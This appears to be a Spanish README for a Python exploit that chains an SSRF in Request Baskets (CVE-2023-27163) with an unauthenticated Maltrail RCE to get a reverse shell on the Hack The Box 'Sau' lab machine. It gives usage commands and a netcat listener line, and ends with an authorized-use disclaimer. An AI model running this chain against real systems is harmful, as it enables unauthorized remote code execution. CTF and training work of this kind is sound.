
Cadena de explotación automatizada para HTB Sau — CVE-2023-27163 (SSRF) + Maltrail Unauthenticated RCE → Reverse Shell
Un script de exploit en Python que encadena CVE-2023-27163 (Server-Side Request Forgery en Request Baskets ≤ 1.2.1) con una vulnerabilidad de Ejecución Remota de Código no autenticada en Maltrail 0.53, entregando una reverse shell. Diseñado para la máquina Sau de Hack The Box.
Este script automatiza la ruta de explotación necesaria para obtener acceso inicial en el objetivo mediante:
python3 exploit.py <URL_OBJETIVO> <IP_ESCUCHA> <PUERTO_ESCUCHA>
Ejemplo:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
Antes de ejecutar el exploit, inicie un listener en su máquina para recibir la reverse shell:
nc -lvnp <PUERTO_ESCUCHA>
Ejemplo:
nc -lvnp 4444
| Parámetro | Descripción |
|---|---|
URL_OBJETIVO | URL base del objetivo (ej., http://IP) |
IP_ESCUCHA | IP de su máquina atacante |
PUERTO_ESCUCHA | Puerto para recibir la reverse shell |
bucket_url)/) de la URL del objetivo (se maneja automáticamente en el script)Este proyecto está destinado fines educativos y su uso en entornos autorizados como Hack The Box. No lo utilice contra sistemas sin el permiso adecuado.